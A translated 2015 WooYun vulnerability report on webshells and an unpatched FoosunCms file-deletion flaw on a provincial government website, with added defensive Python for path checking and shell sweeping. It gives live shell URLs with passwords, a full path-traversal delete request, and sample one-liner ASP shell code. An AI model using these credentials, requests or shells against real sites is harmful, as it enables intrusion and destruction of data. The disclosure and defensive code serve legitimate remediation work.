
Vulnerability summary

Defect ID: wooyun-2015-098859

Title: Multiple webshells found on the website of the Shanxi Provincial Civil Air Defense Office

Vendor: 山西省人民防空办公室 (Shanxi Provincial Civil Air Defense Office)

Author: 路人甲

Submitted: 2015-03-02 14:11

Fixed: 2015-04-16 14:12

Published: 2015-04-16 14:12

Type: Successful intrusion

Severity: Low

Self-assessed Rank: 5

Status: Handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-02: Details sent to the vendor, awaiting vendor action
2015-03-06: Vendor confirmed; details visible to the vendor only
2015-03-16: Details disclosed to core white hats and domain experts
2015-03-26: Details disclosed to regular white hats
2015-04-05: Details disclosed to intern white hats
2015-04-16: Details disclosed to the public

Brief description:

Directory browsing had not been disabled, so the webshells were discoverable;
the FoosunCms vulnerability had not been patched, so the site was compromised by several different parties.

Detailed description:

Shell locations:
http://www.sxsrf.gov.cn/help/add.aspx, password ghost
http://www.sxsrf.gov.cn/1.asp, password gtmlld
http://www.sxsrf.gov.cn/userfiles/511864473244/2013.asp, password admin888
There are many more hidden shells, so I did not bother trying to upload one myself. I did test the arbitrary file deletion and deleted the readme.txt file under the upload directory userfiles:

POST http://www.sxsrf.gov.cn/configuration/system/selectuserpic.aspx?FileType=user_pic HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.sxsrf.gov.cn/configuration/system/selectuserpic.aspx?FileType=user_pic
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.sxsrf.gov.cn
Content-Length: 2104
Connection: Keep-Alive
Pragma: no-cache
Cookie: ASPSESSIONIDAQQSQRBB=EPPECHBAJLLBOPNOJGAJEFGI; ASP.NET_SessionId=azxlqh551wjsbu550gmpxe45; ASPXSpy=71144850f4fb4cc55fc0ee6935badddf; SITEINFO=JB5ljyr0IxdIk+hfYhdObcgN6C8hJ9b9LwdShOJWZXE=; _gscbrs_1831248370=1; _gscu_1831248370=25126075puwrxx21; _gscs_1831248370=25126075rbcd1b21|pv:3
__VIEWSTATE=%2FwEPDwUKMTg4NDc0NDQ5MA9kFgJmD2QWBAIBDxYCHglpbm5lcmh0bWwF4gE8c3BhbiBzdHlsZT0icGFkZGluZy1sZWZ0OjEwcHg7Ij48YSBocmVmPSJqYXZhc2NyaXB0OkFkZERpcignJyk7IiBjbGFzcz0idG9wbmF2aWNoYXIiPuWIm%2BW7uuebruW9lTwvYT4mbmJzcDsmbmJzcDs8YSBocmVmPSJqYXZhc2NyaXB0OlVwRmlsZSgnJywnJyk7IiAgY2xhc3M9InRvcG5hdmljaGFyIj48c3BhbiBzdHlsZT0iY29sb3I6cmVkOyI%2B5LiK5Lyg5paH5Lu2PC9zcGFuPjwvYT48L3NwYW4%2BZAIDDxYCHwAFmAk8ZGl2IHN0eWxlPSJwYWRkaW5nLWxlZnQ6MTBweDsiPuW9k%2BWJjeebruW9lTovVXNlcmZpbGVzLzQ1Nzg0Mzg5OTMxODwvZGl2PjxkaXYgc3R5bGU9InBhZGRpbmctbGVmdDoxMHB4OyI%2B5Zyw5Z2A77yaPGlucHV0IHR5cGU9InRleHQiIGlkPSJzVXJsIiBuYW1lPSJzVXJsIiBzdHlsZT0id2lkdGg6NjAlIiAvPiZuYnNwOzxpbnB1dCB0eXBlPSJidXR0b24iIGNsYXNzPSJmb3JtIiBuYW1lPSJTdWJtaXQiIHZhbHVlPSLpgInmi6nmraTmlofku7YiIG9uY2xpY2s9IlJldHVyblZhbHVlKGRvY3VtZW50LlRlbXBsZXRzbGlzdC5zVXJsLnZhbHVlKTsiIC8%2BPC9kaXY%2BPHRhYmxlIGJvcmRlcj0iMCIgY2xhc3M9InRhYmxlIiB3aWR0aD0iMTAwJSIgY2VsbHBhZGRpbmc9IjUiIGNlbGxzcGFjaW5nPSIxIj48dHIgY2xhc3M9IlRSX0JHX2xpc3QiIG9ubW91c2VvdmVyPSJqYXZhc2NyaXB0Om92ZXJDb2xvcih0aGlzKTsiIG9ubW91c2VvdXQ9ImphdmFzY3JpcHQ6b3V0Q29sb3IodGhpcyk7Ij48dGQgY2xhc3M9Imxpc3RfbGluayIgYWxpZ249ImxlZnQiPjxhIGhyZWY9ImphdmFzY3JpcHQ6RWRpdEZpbGUoJycsJzMzNC5hc3A7MS5qcGcnKSIgY2xhc3M9Imxpc3RfbGluayI%2BPGltZyBzcmM9Ii4uLy4uL3N5c2ltYWdlcy9mb2xkZXIvcmUuZ2lmIiBib3JkZXI9IjAiIGFsdD0i5pS55ZCNIiAvPjwvYT48YSBocmVmPSJqYXZhc2NyaXB0OkRlbEZpbGUoJycsJzMzNC5hc3A7MS5qcGcnKSIgY2xhc3M9Imxpc3RfbGluayI%2BPGltZyBzcmM9Ii4uLy4uL3N5c2ltYWdlcy9mb2xkZXIvZGVsLmdpZiIgYm9yZGVyPSIwIiBhbHQ9IuWIoOmZpCIgLz48L2E%2BICA8aW1nIHNyYz0iLi4vLi4vc3lzSW1hZ2VzL0ZpbGVJY29uL2pwZy5naWYiPjxhIGNsYXNzPSJsaXN0X2xpbmsiIGhyZWY9ImphdmFzY3JpcHQ6c0ZpbGVzKCcve0B1c2VyZGlyZmlsZX0vNDU3ODQzODk5MzE4LzMzNC5hc3A7MS5qcGcnKTsiIG9ubW91c2VvdmVyPSJqYXZhc2NyaXB0OlNob3dEaXZQaWModGhpcywnL1VzZXJmaWxlcy80NTc4NDM4OTkzMTgvMzM0LmFzcDsxLmpwZycsJy5qcGcnLDU3KTsiIG9ubW91c2VvdXQ9ImphdmFzY3JpcHQ6aGlkZERpdlBpYygpOyIgIG9uZGJsY2xpY2s9IlJldHVyblZhbHVlKGRvY3VtZW50LlRlbXBsZXRzbGlzdC5zVXJsLnZhbHVlKTsiPjMzNC5hc3A7MS5qcGc8L3RkPjwvdHI%2BPC90YWJsZT5kZG5E7S6LWhat5JMJgkZw
QBZc%2BjNd&sUrl=&Type=DelFile&Path=&ParentPath=&OldFileName=&NewFileName=&filename=..%2Freadme.txt&Urlx=
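The request above deletes a file by passing filename=../readme.txt to the DelFile action of selectuserpic.aspx; decoding the __VIEWSTATE shows the page was listing /Userfiles/457843899318 (and that the listing already contained a 334.asp;1.jpg), so the handler joined the submitted name onto the caller's directory and unlinked whatever the result pointed at, one level up. The following Python is an added example, not FoosunCms code, of the containment check such a handler needs. UPLOAD_ROOT, the function names and the use of 457843899318 as the caller's directory are assumptions made for illustration; the ViewState is elided from the constructed sample body.

```python
# Added example, not FoosunCms code: the containment check the DelFile
# handler shown above is missing. UPLOAD_ROOT, the function names and the
# per-user directory used in the checks are assumptions for illustration.
import posixpath
from typing import Optional
from urllib.parse import parse_qs

UPLOAD_ROOT = "/inetpub/wwwroot/userfiles"   # assumed site layout
SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".ashx", ".asmx", ".cer", ".cdx")


def resolve_delete_target(user_dir: str, filename: str) -> Optional[str]:
    """Map a requested file name onto the caller's own upload directory.

    Returns the absolute path that may be deleted, or None when the request
    must be refused: empty parts, NUL bytes, backslashes (IIS treats them as
    separators, so a POSIX normpath would miss them), a user_dir or filename
    that resolves outside the caller's directory, or a script extension in
    the name, including the IIS 6 'x.asp;y.jpg' form.
    """
    if not user_dir or not filename:
        return None
    if any(c in filename or c in user_dir for c in ("\x00", "\\")):
        return None
    base = posixpath.normpath(posixpath.join(UPLOAD_ROOT, user_dir))
    if not base.startswith(UPLOAD_ROOT + "/"):
        return None                     # user_dir itself escaped the root
    target = posixpath.normpath(posixpath.join(base, filename))
    if not target.startswith(base + "/"):
        return None                     # '../readme.txt' is rejected here
    name = posixpath.basename(target).lower()
    for ext in SCRIPT_EXTS:
        if name.endswith(ext) or (ext + ";") in name:
            return None
    return target


def delete_request_allowed(body: str, user_dir: str) -> bool:
    """Gate a selectuserpic.aspx POST body; True means the delete may proceed."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("Type", [""])[0] != "DelFile":
        return True                     # only the delete action is gated here
    filename = params.get("filename", [""])[0]
    return resolve_delete_target(user_dir, filename) is not None


# The body from the report with the ViewState elided (constructed sample).
REPORTED_BODY = ("__VIEWSTATE=elided&sUrl=&Type=DelFile&Path=&ParentPath="
                 "&OldFileName=&NewFileName=&filename=..%2Freadme.txt&Urlx=")
```

The check is made against the caller's own directory rather than against the upload root, because the deletion in the report stayed inside userfiles and would pass a root-only test; the script-extension refusal is there because, as the shell list shows, the upload tree is exactly where the attackers' .asp files ended up.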

Proof of vulnerability:

Screenshots (not reproduced here): QQ截图20150228205423.jpg, QQ截图20150228205431.jpg, QQ截图20150228205527.jpg, QQ截图20150228210112.jpg

Fix recommendation:

Patch FoosunCms promptly, disable directory browsing, audit the files under the site directory and remove the shells.
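The recommendation to audit the site directory is easier to act on with a script. The following Python is an added example, not part of the report or of FoosunCms, of a first-pass sweep over an upload tree that flags the patterns seen in this case: script extensions in a directory that should hold only uploads, the IIS 6 x.asp;y.jpg name trick, a parent directory named with a script extension, and a few one-liner shell constructs in file contents. The sample tree built in demo() is constructed to mirror the report's findings; the indicator list, paths and names are assumptions, and every hit still needs a human look before deletion.

```python
# Added example, not part of the report: sweep an upload directory for the
# file patterns behind the shells listed above. The sample tree, the
# indicator strings and the extension list are assumptions for illustration.
import os
import re
import tempfile
from typing import List, Tuple

SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".ashx", ".asmx", ".cer", ".cdx", ".php", ".jsp")

# Constructs typical of one-liner ASP/ASP.NET shells; short on purpose,
# a hit means "review by hand", not "confirmed shell".
INDICATORS = re.compile(
    rb"(?i)(\b(eval|execute|executeglobal)\b[\s(]*request\b"
    rb"|System\.Diagnostics\.Process|cmd\.exe|JScript\.Encode)"
)


def classify(path: str) -> List[str]:
    """Return the reasons a file under the upload tree is suspicious ([] if none)."""
    reasons = []
    name = os.path.basename(path).lower()
    if os.path.splitext(name)[1] in SCRIPT_EXTS:
        reasons.append("script extension in upload dir")
    # IIS 6 serves 'x.asp;y.jpg' as ASP: a script extension right before ';'
    if ";" in name and any(name.split(";")[0].endswith(e) for e in SCRIPT_EXTS):
        reasons.append("semicolon extension trick")
    # IIS 6 also runs every file inside a directory named like 'x.asp'
    parent = os.path.basename(os.path.dirname(path)).lower()
    if os.path.splitext(parent)[1] in SCRIPT_EXTS:
        reasons.append("parent directory has script extension")
    try:
        with open(path, "rb") as f:
            head = f.read(64 * 1024)     # shells are small; the first 64 KiB is enough
    except OSError:
        return reasons
    if INDICATORS.search(head):
        reasons.append("shell indicator in content")
    return reasons


def sweep(root: str) -> List[Tuple[str, List[str]]]:
    """Walk root and return (relative path, reasons) for every flagged file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            p = os.path.join(dirpath, fn)
            why = classify(p)
            if why:
                hits.append((os.path.relpath(p, root).replace(os.sep, "/"), why))
    return sorted(hits)


def demo() -> List[str]:
    """Build a constructed userfiles tree mirroring the report's findings and sweep it."""
    with tempfile.TemporaryDirectory() as root:
        files = {
            # the report's third shell, as a classic ASP one-liner (constructed content)
            "511864473244/2013.asp": b'<%eval request("admin888")%>',
            # a JPEG header followed by ASP, under the name the ViewState listing showed
            "511864473244/334.asp;1.jpg": b'\xff\xd8\xff<%execute request("x")%>',
            "2014/photo.jpg": b"\xff\xd8\xff\xe0 plain jpeg bytes",
            "readme.txt": b"upload directory",
        }
        for rel, data in files.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(data)
        return [rel for rel, _why in sweep(root)]


if __name__ == "__main__":
    for rel in demo():
        print(rel)
```

Run sweep() against the real userfiles directory (and the web root, since two of the shells sat outside userfiles) and review each hit against the CMS's own file inventory before deleting; the content check catches only the crude shells, so the extension and name checks are the ones to trust in an upload tree.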

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Response

Vendor response:

Severity: High

Rank: 11

Confirmed: 2015-03-06 17:13

Vendor reply:

CNVD confirms the described situation; it has been forwarded via CNCERT to the branch center, which will coordinate handling with the site's operating unit.

Latest status:

None